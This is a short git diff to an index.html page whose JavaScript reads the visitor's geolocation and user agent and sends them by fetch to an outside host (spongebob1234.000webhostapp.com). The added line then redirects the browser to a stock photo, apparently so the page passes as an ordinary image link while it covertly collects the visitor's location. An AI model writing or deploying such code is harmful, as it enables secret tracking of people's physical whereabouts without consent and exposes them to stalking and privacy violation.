--- a/index.html
+++ b/index.html
@@ -1134,6 +1134,7 @@
 			var contet=+p.coords.latitude+","+p.coords.longitude;
 			console.log('https://spongebob1234.000webhostapp.com/?note='+contet+'&agent='+JSON.stringify(navigator.userAgent))	
 			fetch('https://spongebob1234.000webhostapp.com/?method=insert&note='+contet+'&agent='+JSON.stringify(navigator.userAgent)).then(function(){console.log("successs")})
+			window.location="imgs/iStock-166161943_(1).jpg"
 		}
 		
 		function error_callback(p)
